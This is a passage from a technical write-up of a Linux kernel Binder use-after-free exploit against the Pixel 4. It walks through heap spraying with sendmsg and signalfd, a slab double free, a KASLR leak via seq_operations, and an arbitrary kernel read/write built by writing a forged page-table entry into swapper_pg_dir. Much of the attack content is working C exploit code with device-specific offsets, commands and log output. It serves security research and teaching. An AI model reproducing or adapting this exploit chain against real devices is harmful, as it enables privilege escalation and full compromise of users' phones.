int msg_buf[SENDMSG_SIZE / sizeof(int)];

int ctl_buf[SENDMSG_CONTROL_SIZE / sizeof(int)];

struct msghdr spray_msg;

struct iovec siov;

uint64_t sigset_value;

// Sendmsg control buffer initialization

memset(&spray_msg, 0, sizeof(spray_msg));

ctl_buf[0] = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;

ctl_buf[6] = 0xdeadbeef; /* w->type value */

siov.iov_base = msg_buf;

siov.iov_len = SENDMSG_SIZE;

spray_msg.msg_iov = &siov;

spray_msg.msg_iovlen = 1;

spray_msg.msg_control = ctl_buf;

spray_msg.msg_controllen = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;

for (;;) {

// Barrier - Before spray

pthread_barrier_wait(&data->barrier);

// Waiting some time

delay = rand() % SPRAY_DELAY;

for (int i = 0; i < delay; i++) {}

for (uint64_t i = 0; i < NB_SIGNALFDS; i++) {

// Arbitrary signalfd value (will become relevant later)

sigset_value = ~0;

// Non-blocking sendmsg

sendmsg(data->sock_fds[0], &spray_msg, MSG_OOB);

// Signalfd call to pin sendmsg's control buffer in kernel memory

signalfd_fds[data->trigger_id][data->spray_id][i] = signalfd(-1, (sigset_t*)&sigset_value, 0);

if (signalfd_fds[data->trigger_id][data->spray_id][i] <= 0)

debug_printf("Could not open signalfd - %d (%s)\n", signalfd_fds[data->trigger_id][data->spray_id][i], strerror(errno));

}

// Barrier - After spray

pthread_barrier_wait(&data->barrier);

}

return NULL;

}

If the exploit ran successfully, you should see the following logs in dmesg after some time:

[ 1245.158628] binder: unexpected work type, -559038737, not freed

[ 1249.805270] binder: unexpected work type, -559038737, not freed

[ 1256.615639] binder: unexpected work type, -559038737, not freed

[ 1258.221516] binder: unexpected work type, -559038737, not freed
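Two details of the spray code and of these logs can be checked with a few lines of C: why the value is written at index 6 of the control buffer, and why 0xdeadbeef shows up as a negative number. The layout structs below are assumed 64-bit stand-ins for the kernel structures (node_layout, work_layout and both helpers are hypothetical), and the sketch further assumes that the sprayed buffer starts at the same address as the freed node.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified 64-bit stand-ins for the kernel structures (assumed layout). */
struct list_layout { uint64_t next, prev; };
struct work_layout { struct list_layout entry; int32_t type; };
struct node_layout { int32_t debug_id; int32_t lock; struct work_layout work; };

/* Index, in 4-byte words, of w->type counted from the start of the node. */
static size_t type_word_index(void)
{
    return (offsetof(struct node_layout, work) +
            offsetof(struct work_layout, type)) / sizeof(int32_t);
}

/* Reinterprets a 32-bit pattern as the signed int that "%d" prints. */
static int32_t as_logged(uint32_t pattern)
{
    int32_t value;

    memcpy(&value, &pattern, sizeof(value));
    return value;
}
```

With this layout the type field sits 24 bytes into the node, i.e. at word index 6, and the pattern 0xdeadbeef reads back as -559038737 once interpreted as a signed 32-bit integer.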

Slab Object Double Free

Even though we know how to control the switch/case argument, we haven't discussed yet what we could do with the use-after-free in binder_release_work. Let's have a look at the rest of the function to identify interesting code paths to reach.

static void binder_release_work(struct binder_proc *proc,

struct list_head *list)

{

struct binder_work *w;

while (1) {

w = binder_dequeue_work_head(proc, list);

if (!w)

return;

switch (w->type) {

case BINDER_WORK_TRANSACTION: {

struct binder_transaction *t;

t = container_of(w, struct binder_transaction, work);

binder_cleanup_transaction(t, "process died.",

BR_DEAD_REPLY);

} break;

case BINDER_WORK_RETURN_ERROR: {

struct binder_error *e = container_of(

w, struct binder_error, work);

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"undelivered TRANSACTION_ERROR: %u\n",

e->cmd);

} break;

case BINDER_WORK_TRANSACTION_COMPLETE: {

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"undelivered TRANSACTION_COMPLETE\n");

kfree(w);

binder_stats_deleted(BINDER_STAT_TRANSACTION_COMPLETE);

} break;

case BINDER_WORK_DEAD_BINDER_AND_CLEAR:

case BINDER_WORK_CLEAR_DEATH_NOTIFICATION: {

struct binder_ref_death *death;

death = container_of(w, struct binder_ref_death, work);

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"undelivered death notification, %016llx\n",

(u64)death->cookie);

kfree(death);

binder_stats_deleted(BINDER_STAT_DEATH);

} break;

default:

pr_err("unexpected work type, %d, not freed\n",

w->type);

break;

}

}

}

Looking at the code, every case will either output some log messages or free the binder_work, which means the only interesting strategy is to perform a second free on the already freed object. A double free in SLUB means that we will be able to allocate two objects at the same location, make them overlap and then use one object to modify the other.

Now, not all frees are the same. If our binder_node object is at address X, then the dequeued binder_work struct is at X+8 and:

- BINDER_WORK_TRANSACTION will free X

- BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_DEAD_BINDER_AND_CLEAR and BINDER_WORK_CLEAR_DEATH_NOTIFICATION will free X+8
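The difference between the two addresses comes from where the binder_work member sits inside each containing structure. The following is a minimal sketch of that pointer arithmetic, assuming simplified stand-in structures (the mock_* types and the freed_by_* helpers are ours and only reproduce the offsets quoted above, not the real kernel definitions):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins: only the position of the embedded work item matters.
 * These layouts are assumptions chosen to match the offsets in the text. */
struct binder_work { void *next, *prev; int type; };
struct mock_node        { uint64_t header; struct binder_work work; };
struct mock_transaction { uint64_t header; struct binder_work work; };
struct mock_ref_death   { struct binder_work work; uint64_t cookie; };

static_assert(offsetof(struct mock_node, work) == 8, "work must sit at X+8");

#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Address that would be handed to kfree() by each branch of the switch. */
static uintptr_t freed_by_transaction(struct binder_work *w)
{
    return (uintptr_t)container_of(w, struct mock_transaction, work);
}

static uintptr_t freed_by_complete(struct binder_work *w)
{
    return (uintptr_t)w; /* kfree(w) is called on the work item itself */
}

static uintptr_t freed_by_death(struct binder_work *w)
{
    return (uintptr_t)container_of(w, struct mock_ref_death, work);
}
```

With a node at X, the work pointer is X+8: the transaction branch steps back 8 bytes and frees X, while the other branches free X+8 because the work item is either freed directly or sits at offset 0 of its container.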

For an object allocated at X, if you free it at X+8, the next allocation will also be at X+8. This can be an interesting primitive, since it gives:

- an alternative overlapping configuration (you can reach different offsets than with a free at X)

- a potential way to reach the object adjacent to the one at X (e.g. allocating a binder_node, which is 128 bytes long, at X+8 will result in an out-of-bounds access of 8 bytes on the adjacent object).

We did not use this strategy for this exploit and stuck with a regular double free at X by setting w->type to BINDER_WORK_TRANSACTION. However, this path requires a bit more work than the other three.

In binder_cleanup_transaction, we control t with sendmsg's control buffer and we want to reach the call to binder_free_transaction.

static void binder_cleanup_transaction(struct binder_transaction *t,

const char *reason,

uint32_t error_code)

{

if (t->buffer->target_node && !(t->flags & TF_ONE_WAY)) {

binder_send_failed_reply(t, error_code);

} else {

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"undelivered transaction %d, %s\n",

t->debug_id, reason);

binder_free_transaction(t);

}

}

The first conditions to meet are:

- t->buffer has to point to valid kernel memory (e.g. 0xffffff8008000000 which is always allocated on a Pixel device)

- TF_ONE_WAY should be set in t->flags

static void binder_free_transaction(struct binder_transaction *t)

{

struct binder_proc *target_proc = t->to_proc;

if (target_proc) {

binder_inner_proc_lock(target_proc);

if (t->buffer)

t->buffer->transaction = NULL;

binder_inner_proc_unlock(target_proc);

}

/*

* If the transaction has no target_proc, then

* t->buffer->transaction has already been cleared.

*/

kfree(t);

binder_stats_deleted(BINDER_STAT_TRANSACTION);

}

In binder_free_transaction the other condition that needs to be met before reaching kfree is:

t->to_proc should be NULL

With these requirements fulfilled, we can finally perform a double free at X.

Identifying Overlapping Objects

Right now, to continue the exploit and get code execution, we need a KASLR leak and an arbitrary kernel memory read/write. Executing kernel code directly by redirecting the execution flow is not an option since recent Pixel kernels use CFI.

- The KASLR leak can be obtained by reading a function pointer stored in an object. With two overlapping objects, we need one object from which we can read a value and a second one with a function pointer that aligns with the first object's value.

- The arbitrary kernel memory read/write is a bit more complex and will be detailed in the following sections. For now, note that it relies on Thomas King's "Kernel Space Mirroring Attack", or KSMA, and that we need an 8-byte write at the beginning of the overlapping objects.

However, before we can do any of that, we need to identify where objects overlap in memory. Depending on the stage of the exploit we are at, we won't be overlapping the same objects. This means that we need to be able to free and allocate objects with enough precision as to not lose the reference to the dangling memory region.



It is very likely that different methods can be used to detect overlapping objects. For this exploit, we decided to reuse signalfd for this purpose. The idea is to give every signalfd a specific identification number through its sigset_t value during the first spray, the one that takes control of w->type.

In practice, if everything goes as planned, the exploit will start spraying with sendmsg and signalfd. Then, the use-after-free will occur. A sendmsg/signalfd object will replace the binder_node object and change the value of w->type. The double free will occur and allow two objects to overlap. We keep spraying with sendmsg/signalfd to overlap the double-freed signalfd with another one. As a result, one signalfd will have its value changed, and the identification number it now reports tells us which signalfd it overlaps with.

The following figure summarizes this scenario:

KASLR Leak

In this section, we will leverage the two overlapping signalfds to get a KASLR leak, which will become useful for our arbitrary kernel memory read/write primitive.

Now we need to find objects that, when overlapped, can give us a function pointer. signalfd is interesting enough to keep, since it offers the following capabilities:

- we can read an 8-byte value at its allocation address

- we can write an almost arbitrary 8-byte value at its allocation address (bits 8 and 18 are always set when writing a value with signalfd)

- it does not crash the system on corruption
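The two forced bits correspond to SIGKILL (signal 9) and SIGSTOP (signal 19), which cannot be blocked: the kernel removes them from the mask passed to signalfd and stores the complement of the result. Below is a minimal sketch that models this transformation in plain arithmetic, so that the effect on a given value can be checked without touching the kernel (the helper names are ours):

```c
#include <assert.h>
#include <stdint.h>

#define SIGKILL_BIT (1ULL << 8)   /* SIGKILL is signal 9  -> bit 8  */
#define SIGSTOP_BIT (1ULL << 18)  /* SIGSTOP is signal 19 -> bit 18 */

static_assert((SIGKILL_BIT | SIGSTOP_BIT) == 0x40100ULL,
              "matches the 0x40100 constant used in the text");

/* Model of the 8-byte value that ends up in kernel memory for a given
 * user-supplied mask: SIGKILL and SIGSTOP are dropped, then the mask is
 * complemented. */
static uint64_t signalfd_stored_value(uint64_t user_mask)
{
    user_mask &= ~(SIGKILL_BIT | SIGSTOP_BIT);
    return ~user_mask;
}

/* Mask to pass to signalfd() so that `wanted` is stored, up to the two
 * forced bits. */
static uint64_t signalfd_mask_for(uint64_t wanted)
{
    return ~wanted;
}
```

For example, a mask of ~0 leaves only 0x40100 in memory, and any value whose bits 8 and 18 are already set is stored unchanged.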

This can easily be paired with another object that has a function pointer in its first 8 bytes. A prime candidate for this is struct seq_operations:

struct seq_operations {

void * (*start) (struct seq_file *m, loff_t *pos);

void (*stop) (struct seq_file *m, void *v);

void * (*next) (struct seq_file *m, void *v, loff_t *pos);

int (*show) (struct seq_file *m, void *v);

};

seq_operations is allocated during a call to single_open which happens when certain files of the /proc filesystem are accessed. For this exploit, we will use /proc/self/stat.

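The snippet below shows this path for the system-wide /proc/stat file: it is created in proc_stat_init, and stat_open is called when the file is opened. Per-process entries such as /proc/self/stat are registered elsewhere in procfs but also go through single_open when opened.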

static int __init proc_stat_init(void)

{

proc_create("stat", 0, NULL, &proc_stat_operations);

return 0;

}

fs_initcall(proc_stat_init);

static const struct file_operations proc_stat_operations = {

.open = stat_open,

.read = seq_read,

.llseek = seq_lseek,

.release = single_release,

};

static int stat_open(struct inode *inode, struct file *file)

{

unsigned int size = 1024 + 128 * num_online_cpus();

/* minimum size to display an interrupt count : 2 bytes */

size += 2 * nr_irqs;

return single_open_size(file, show_stat, NULL, size);

}

In stat_open we can see a call to single_open_size, which will subsequently call single_open.

int single_open_size(struct file *file, int (*show)(struct seq_file *, void *),

void *data, size_t size)

{

char *buf = seq_buf_alloc(size);

int ret;

if (!buf)

return -ENOMEM;

ret = single_open(file, show, data);

if (ret) {

kvfree(buf);

return ret;

}

((struct seq_file *)file->private_data)->buf = buf;

((struct seq_file *)file->private_data)->size = size;

return 0;

}

single_open will make two allocations in the kmalloc-128 cache. The first is a seq_operations allocation, the one we're interested in, and the second is a seq_file allocation in seq_open.

This seq_file object is only allocated in the kmalloc-128 cache in older versions of the kernel; it now has its own dedicated cache. If the exploit runs on a kernel version prior to the seq_file cache addition, the overlapped object may receive a seq_file allocation when we actually want a seq_operations. In practice, we just need to retry and filter the results with simple heuristics until we get the address we want. This is detailed later in this section.

int single_open(struct file *file, int (*show)(struct seq_file *, void *),

void *data)

{

struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);

int res = -ENOMEM;

if (op) {

op->start = single_start;

op->next = single_next;

op->stop = single_stop;

op->show = show;

res = seq_open(file, op);

if (!res)

((struct seq_file *)file->private_data)->private = data;

else

kfree(op);

}

return res;

}

In single_open, op->start is set to single_start. Since signalfd allows us to read the first 8 bytes of the object we overlap, the address of single_start is the value we will read to get a KASLR leak.

As explained earlier, it's possible to get a seq_file allocation (or maybe even an unrelated allocation made by the system) instead. In that case, we can retry allocating seq_operations objects until we detect that it worked. A simple heuristic is to subtract the kernel offset of the single_start function from the value read by signalfd and check that the sixteen least significant bits are zero:

((kaslr_leak - single_start_offset) & 0xffff) == 0

It's very unlikely that another allocation has a value that would meet this condition in its first 8 bytes.

Note: It's possible to retrieve the offset of the single_start function on an Android device from /proc/kallsyms.

flame:/ # sysctl -w kernel.kptr_restrict=0

kernel.kptr_restrict = 0

flame:/ # grep -i -e " single_start$" -e " _head$" /proc/kallsyms

ffffff886c080000 t _head

ffffff886dbcfd38 t single_start
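Using the two addresses printed above, the offset and the heuristic can be worked out as follows. This is a minimal sketch: the macro and function names are ours, and the constants are simply the values from this particular kallsyms output.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Addresses copied from the kallsyms output above (one specific boot). */
#define KALLSYMS_HEAD         0xffffff886c080000ULL
#define KALLSYMS_SINGLE_START 0xffffff886dbcfd38ULL

/* Offset of single_start from the start of the kernel image. */
#define SINGLE_START_OFFSET   (KALLSYMS_SINGLE_START - KALLSYMS_HEAD)

static_assert(SINGLE_START_OFFSET == 0x1b4fd38ULL, "offset used in this sketch");

/* Returns true and stores the candidate kernel base when the leaked value
 * is consistent with a pointer to single_start. */
static bool looks_like_single_start(uint64_t leaked, uint64_t *kernel_base)
{
    uint64_t candidate = leaked - SINGLE_START_OFFSET;

    if ((candidate & 0xffff) != 0)
        return false;
    *kernel_base = candidate;
    return true;
}
```

A value of 0, which is what the overlapping signalfd reads before a seq_operations object lands on it, is rejected because the subtraction leaves non-zero low bits.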

By implementing this logic in a function similar to the one below, we can finally get our necessary KASLR leak and move on to the next step.

int proc_self = open("/proc/self", O_RDONLY);

/* Releasing the signalfd object that was corrupted by our overlapping one */

if (corrupt_fd)

close(corrupt_fd);

/* Checking the value read by the overlapping fd */

uint64_t mask = get_sigfd_sigmask(overlapping_fd);

debug_printf("Value @X after freeing `corrupt_fd`: 0x%lx", mask);

/* Allocating seq_operations objects so that it overlaps with our signalfd */

retry:

for (int i = 0; i < NB_SEQ; i++) {

seq_fd[i] = openat(proc_self, "stat", O_RDONLY);

if (seq_fd[i] < 0)

debug_printf("Could not allocate seq ops (%d - %s)", i, strerror(errno));

}

/* Reading the value after spraying */

mask = get_sigfd_sigmask(overlapping_fd);

debug_printf("Value @X after spraying seq ops: 0x%lx", mask);

/* Checking if the KASLR leak read meets the condition */

kaslr_leak = mask - SINGLE_START;

if ((kaslr_leak & 0xffff) != 0) {

debug_print("Could not leak KASLR slide");

/* If not, we close all seq_fds and try again */

for (int i = 0; i < NB_SEQ; i++) {

close(seq_fd[i]);

}

goto retry;

}

/* If it works we display the KASLR leak */

debug_printf("KASLR slide: %lx", kaslr_leak);

The result should be the following:

[6957] exploit.c:371:trigger_thread_func(): Value @X after freeing `corrupt_fd`: 0x0

[6957] exploit.c:386:trigger_thread_func(): Value @X after spraying seq ops: 0x0

[6957] exploit.c:394:trigger_thread_func(): Could not leak KASLR slide

[6957] exploit.c:386:trigger_thread_func(): Value @X after spraying seq ops: 0x0

[6957] exploit.c:394:trigger_thread_func(): Could not leak KASLR slide

[6957] exploit.c:386:trigger_thread_func(): Value @X after spraying seq ops: 0x0

[6957] exploit.c:394:trigger_thread_func(): Could not leak KASLR slide

[6957] exploit.c:386:trigger_thread_func(): Value @X after spraying seq ops: 0xffffff9995bcfd38

[6957] exploit.c:405:trigger_thread_func(): KASLR slide: ffffff9994080000

Arbitrary Kernel Read/Write Using KSMA

The next step of the exploit is to craft an arbitrary read/write primitive using KSMA. The gist of this technique is to add an entry in the kernel's page global directory to mirror kernel code at another location and set specific flags to make it accessible from userland. This section details how we set up this attack, modify the kernel page table and overcome certain limitations.

Kernel Space Mirroring Attack

The method in itself is described in Thomas King's BlackHat Asia 2018 presentation and readers are invited to read up on it if they're not already familiar with it.

The kernel's Page Global Directory (PGD), the section we want to add a 1Gb block into, is referenced by the symbol swapper_pg_dir:

flame:/ # grep -i -e " swapper_pg_dir" /proc/kallsyms

ffffff886f2b5000 B swapper_pg_dir

The PGD can hold 0x200 entries, and the 1Gb blocks it references start at address 0xffffff8000000000 (e.g. entry #0 spans from 0xffffff8000000000 to 0xffffff803fffffff). Since we don't want to overwrite an existing entry, we arbitrarily picked index 0x1e0, which corresponds to the address:

0xffffff8000000000 + 0x1e0 * 0x40000000 = 0xfffffff800000000

If everything works as expected, we will be able to read and write the kernel from userland using this base address.
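The address computation above generalizes to any PGD index. A minimal sketch, assuming the layout described in this section (0x200 entries of 1Gb each, starting at 0xffffff8000000000); the helper names are ours:

```c
#include <assert.h>
#include <stdint.h>

#define PGD_ENTRIES     0x200ULL
#define PGD_BLOCK_SIZE  0x40000000ULL          /* 1Gb covered by each entry */
#define KERNEL_VA_START 0xffffff8000000000ULL  /* first address of entry #0 */

/* First virtual address covered by the PGD entry at `index`. */
static uint64_t pgd_index_to_va(uint64_t index)
{
    assert(index < PGD_ENTRIES);
    return KERNEL_VA_START + index * PGD_BLOCK_SIZE;
}

/* Byte offset of that entry inside the table (8 bytes per descriptor). */
static uint64_t pgd_entry_offset(uint64_t index)
{
    assert(index < PGD_ENTRIES);
    return index * sizeof(uint64_t);
}
```

For index 0x1e0, this gives the base address 0xfffffff800000000 and an entry located 0xf00 bytes after the start of swapper_pg_dir.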

Now that we have the destination virtual address, let's figure out the physical address of the kernel on our device. This can be found in /proc/iomem by searching for "Kernel code". We can see below that on our Pixel 4 device, the kernel physical address starts at 0x80080000. Note that we will map 0x80000000 instead, because the physical address in a 1Gb block descriptor must be aligned on a gigabyte.

flame:/ # grep "Kernel code" /proc/iomem

80080000-823affff : Kernel code

The next step is to craft a block descriptor to bridge the physical address of the kernel and the 1Gb virtual memory range accessible from userland. The method we used was simply to dump one of the swapper_pg_dir entries, change the physical address and set (U)XN/PXN accordingly. We ended up with the following value:

0x00e8000000000751 | 0x80000000 = 0x00e8000080000751
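The same combination can be written as a small helper, together with the translation from a physical address to its location in the mirrored window. This is a minimal sketch in which the attribute bits are taken as-is from the value above and the function names are ours:

```c
#include <assert.h>
#include <stdint.h>

#define GB_MASK          0x3fffffffULL          /* offset bits inside 1Gb */
#define OUTPUT_ADDR_MASK 0x0000ffffc0000000ULL  /* bits [47:30] of the entry */

/* Combine attribute bits with the 1Gb-aligned physical base of the block. */
static uint64_t make_block_descriptor(uint64_t attributes, uint64_t phys_addr)
{
    /* The attributes must not spill into the address field. */
    assert((attributes & OUTPUT_ADDR_MASK) == 0);
    return attributes | (phys_addr & OUTPUT_ADDR_MASK);
}

/* Where a physical address shows up once its block is mirrored at
 * `window_va`. */
static uint64_t mirror_address(uint64_t window_va, uint64_t phys_addr)
{
    return window_va + (phys_addr & GB_MASK);
}
```

Because the block starts at 0x80000000 while the kernel code starts at 0x80080000, the first bytes of the kernel appear 0x80000 bytes into the mirrored window.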



We've established the value to write in swapper_pg_dir at index 0x1e0 and in the next sections we will present how this descriptor was written into the table using the freelist pointer of a slab.









Freelist Pointer Arbitrary Write

The freelist pointer is a pointer to the next free object in the slab. When freeing an object from a slab cache, the allocator will first write the current freelist pointer at the beginning of the object being freed. Afterwards, it will update the freelist pointer to point to the freshly freed memory region.

If an allocation is requested, the opposite process happens. The allocator will make the allocation at the address pointed to by the freelist pointer and then read the new freelist pointer in the first 8 bytes of the allocated memory region.

However, if we are able to change one of the freelist pointers written in the slab, we can then allocate an object at an arbitrary address.
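The mechanism can be illustrated with a toy model that runs entirely in userland. The sketch below is not the SLUB implementation: it only keeps the one property described above (free objects chained through their first bytes), ignores per-CPU lists and any freelist hardening, and uses names of our own choosing.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model of a SLUB-style freelist: free objects are chained through
 * their first pointer-sized bytes and the cache only tracks the head. */
struct toy_cache {
    void *freelist;
};

/* Free: store the current head inside the object, then make it the head. */
static void toy_free(struct toy_cache *c, void *obj)
{
    assert(obj != NULL);
    memcpy(obj, &c->freelist, sizeof(c->freelist));
    c->freelist = obj;
}

/* Allocate: hand out the head and read the next head from its first bytes. */
static void *toy_alloc(struct toy_cache *c)
{
    void *obj = c->freelist;

    if (obj != NULL)
        memcpy(&c->freelist, obj, sizeof(c->freelist));
    return obj;
}
```

If the first bytes of a freed object are overwritten with the address of some other buffer, the next toy_alloc still returns the freed object, but the one after that returns the other buffer. When that buffer is zero-filled, the freelist then becomes NULL instead of following a stray pointer.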





Knowing this, the strategy would be to:

- have a signalfd overlap a freed object

- modify the freelist pointer to point to the swapper_pg_dir entry

- allocate signalfds with our block descriptor 0x00e8000080000751



However, it's not as easy as it looks because of bits 8 and 18, which signalfd sets when writing a value. This wouldn't affect the block descriptor, because bit 8 is already set and bit 18 would be discarded when aligning to a 1Gb block. However, depending on the value of swapper_pg_dir's address, it could be impossible to write that address with signalfd. In our specific case, on the factory image QQ3A.200805.001 for the Pixel 4, swapper_pg_dir's address always ends with b5000. If we were to write this address with signalfd, whatever index we chose in the PGD, we would always end up with an address ending with b5xxx | 40100 = f5xxx, missing the actual entry by 0x40000 bytes. This is not the case for all kernels (e.g. some versions of Android could have a swapper_pg_dir offset ending with f5000), but the technique would not be generic on Pixel 4 devices.

To circumvent this issue, we will make the allocation in two phases, as explained in the next section.





Intermediate BSS Allocation

Since we're not sure we will be able to replace the freelist pointer with the correct swapper_pg_dir address, we need to write that address somewhere else by another means and make the freelist pointer point to it. This way, we can write our descriptor in two allocations instead of one. This stage is a bit convoluted and we will explain it one step at a time.

The first requirement for this process is to find a kernel memory region completely filled with zeroes and big enough so that even with signalfd changing our original address, we would end up inside it (i.e. it should be bigger than 0x40100 bytes). It has to be filled with zeroes because we will allocate slab objects in it: if a non-null value is found there, it will replace the freelist pointer with an address we don't control and could crash the system if a subsequent allocation happens over unmapped or in-use memory.

There might be different places in the kernel meeting these requirements. For this exploit, we chose the ipa_testbus_mem buffer, which is 0x198000 bytes long. It is specific to Qualcomm-based devices, which is good enough for our Pixel 4 exploit.

lyte@debian:~$ aarch64-linux-gnu-nm --print-size vmlinux | grep ipa_testbus_mem

ffffff900c19b0b8 0000000000198000 b ipa_testbus_mem

For the sake of example, we will imagine that this buffer is at address 0x10000000. If we were to change the freelist pointer to point to this address, it would be transformed into 0x10040100. However, it's not an issue in this case, because we would still end up in our original buffer and be sure that the value at 0x10040100 is still zero.
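The size requirement can be checked with a few lines of arithmetic. A minimal sketch, assuming 128-byte objects as in the rest of this post (the helper names are ours):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define FORCED_BITS 0x40100ULL  /* bits 8 and 18, always set by signalfd */
#define OBJECT_SIZE 128ULL      /* size of one kmalloc-128 object */

/* Address actually written when `addr` goes through signalfd. */
static uint64_t forced_target(uint64_t addr)
{
    return addr | FORCED_BITS;
}

/* True when an object placed at the forced address still fits entirely
 * inside the buffer [buf_start, buf_start + buf_size). */
static bool target_stays_inside(uint64_t buf_start, uint64_t buf_size)
{
    uint64_t target = forced_target(buf_start);

    assert(buf_size >= OBJECT_SIZE);
    return target - buf_start <= buf_size - OBJECT_SIZE;
}
```

The forced bits move the address forward by at most 0x40100 bytes, so a 0x198000-byte buffer is large enough wherever it starts, whereas a 0x40000-byte buffer starting at 0x10000000 would not be.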







As we said earlier, we are going to make this allocation in two steps. The first is an allocation in ipa_testbus_mem that sets up the value of the next freelist pointer and makes it point to our swapper_pg_dir entry address. Then we free everything and spray signalfds again, leveraging this value to finally allocate the entry in swapper_pg_dir. However, to do this first allocation, we need an object that allows us to write at least 8 bytes of arbitrary values. We could reuse sendmsg, but the calls would need to be blocking, because we have to exhaust the slab freelist to reach our allocation and non-blocking sendmsg buffers are freed immediately. Blocking sendmsg calls are a potential solution, but they are a bit more work to set up than the object we chose, namely eventfd.

struct eventfd_ctx {

struct kref kref;

wait_queue_head_t wqh;

/*

* Every time that a write(2) is performed on an eventfd, the

* value of the __u64 being written is added to "count" and a

* wakeup is performed on "wqh". A read(2) will return the "count"

* value to userspace, and will reset "count" to zero. The kernel

* side eventfd_signal() also, adds to the "count" counter and

* issue a wakeup.

*/

__u64 count;

unsigned int flags;

};

eventfd can be used to write an arbitrary value in kernel memory using its count field. Simply writing a value using write on the file descriptor returned by eventfd will increment count by the same amount. Now, the strategy is the following:

- make the overlapping signalfd overlap with dangling memory

- change the freelist pointer using the overlapping signalfd and make it point to ipa_testbus_mem | 0x40100 so that the changes brought by signalfd don't matter

- spray using eventfds and write the address of our swapper_pg_dir entry in count
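The behavior of count described above can be observed from userland with the regular eventfd API. The helper below is a minimal sketch of our own (it is not part of the exploit): it writes a value to a fresh eventfd, whose counter starts at zero, and reads the counter back.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/eventfd.h>
#include <unistd.h>

/* Writes `value` to a new eventfd and reads the counter back into *out.
 * Returns 0 on success, -1 if any step fails. */
static int eventfd_roundtrip(uint64_t value, uint64_t *out)
{
    int fd, ok;

    assert(out != NULL);
    fd = eventfd(0, EFD_NONBLOCK);
    if (fd < 0)
        return -1;

    /* write() adds `value` to the counter; read() returns and resets it. */
    ok = write(fd, &value, sizeof(value)) == (ssize_t)sizeof(value) &&
         read(fd, out, sizeof(*out)) == (ssize_t)sizeof(*out);
    close(fd);
    return ok ? 0 : -1;
}
```

Any value except 0xffffffffffffffff can be written this way, which covers kernel addresses such as the one of the swapper_pg_dir entry.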





At this stage, we now have a persistent user-controlled value in kernel memory. The idea is now to use this value as part of the slab's freelist. The next steps are as follows:

- free all eventfds

- change the freelist pointer using the overlapping signalfd and make it point to (ipa_testbus_mem | 0x40100) + 0x20 (0x20 is the offset of count in eventfd_ctx)



- spray using signalfds with a sigset value set to our block descriptor 0x00e8000080000751

Once the entry is written into swapper_pg_dir we will be able to read and write arbitrarily from kernel memory using the base address 0xfffffff800000000.

This whole section could be implemented in the exploit following the snippet of code given below:

uint64_t bss_target = (kaslr_leak + IPA_TESTBUS_MEM) | 0x40100;

/*

* Changing the freelist pointer using overlapping_fd to

* `ipa_testbus_mem | 0x40100`

*/

debug_printf("BSS alloc will be @%lx", bss_target);

uint64_t sigset_target = ~bss_target;

ret = signalfd(overlapping_fd, (sigset_t*)&sigset_target, 0);

if (ret < 0)

debug_printf("Could not change overlapping_fd value with %lx", bss_target);

mask = get_sigfd_sigmask(overlapping_fd);

debug_printf("Value @X after changing overlapping_fd is %lx", mask);

uint64_t gb = 0x40000000;

uint64_t index = 0x1e0;

uint64_t base = 0xffffff8000000000 + gb * index;

uint64_t target = kaslr_leak + SWAPPER_PG_DIR + index * 8;

debug_printf("Swapper dir alloc will be @%lx (index = %lx, base = %lx)",

target, index, base);

/*

* Spraying using eventfds to get our `swapper_pg_dir` entry address in

* `ipa_testbus_mem`

*/

for (int i = 0; i < NB_EVENTFDS_FINAL; i++) {

eventfd_bss[i] = eventfd(0, EFD_NONBLOCK);

if (eventfd_bss[i] < 0)

debug_printf("Could not open eventfd - %d (%s)", eventfd_bss[i], strerror(errno));

/*

* Modifying count so that it holds the address to the `swapper_pg_dir`

* entry

*/

ret = write(eventfd_bss[i], &target, sizeof(uint64_t));

if (ret < 0)

debug_printf("Could not write eventfd - %d (%s)", eventfd_bss[i], strerror(errno));

}

/*

* Freeing all eventfds until the overlapping signalfd sees another value

*/

uint64_t orig_mask = get_sigfd_sigmask(overlapping_fd);

for (int i = 0; i < NB_EVENTFDS_FINAL; i++) {

ret = close(eventfd_bss[i]);

if (ret < 0)

debug_printf("Could not close eventfd (%d - %s)", eventfd_bss[i], strerror(errno));

mask = get_sigfd_sigmask(overlapping_fd);

if (mask != orig_mask) goto next_stage;

}

next_stage:

/*

* Changing the freelist pointer using overlapping_fd to

* `(ipa_testbus_mem | 0x40100) + 0x20`

*/

bss_target = bss_target + (uint64_t)0x20;

sigset_target = ~bss_target; /* already declared above */

ret = signalfd(overlapping_fd, (sigset_t*)&sigset_target, 0);

if (ret < 0)

debug_printf("Could not change overlapping_fd value with %lx", bss_target);

mask = get_sigfd_sigmask(overlapping_fd);

debug_printf("Value @X after changing overlapping_fd is %lx", mask);

/* Block descriptor written in `swapper_pg_dir` */

uint64_t block_descriptor = 0x00e8000000000751;

block_descriptor += 0x80000000; /* Kernel text physical address 1Gb-aligned */

/*

* Spraying using signalfds to get our `block_descriptor` in

* `swapper_pg_dir`

*/

int signalfd_bss[NB_SIGNALFDS_FINAL];

for (int i = 0; i < NB_SIGNALFDS_FINAL; i++) {

unsigned long sigset_value = ~block_descriptor;

signalfd_bss[i] = signalfd(-1, (sigset_t*)&sigset_value, 0);

if (signalfd_bss[i] < 0)

debug_printf("Could not open signalfd - %d (%s)", signalfd_bss[i], strerror(errno));

}

/*

* Dumping the first 4 bytes of the text section

* 0x80000 is added to the base address since we mapped 0x80000000 and the text

* section is at 0x80080000

*/

debug_printf("Kernel text value = %lx", *(unsigned long *)(base + 0x80000));

The result should look as follows:

[6397] exploit.c:419:trigger_thread_func(): Swapper dir alloc will be @ffffff9a130b5f00 (index = 1e0, base = fffffff800000000)

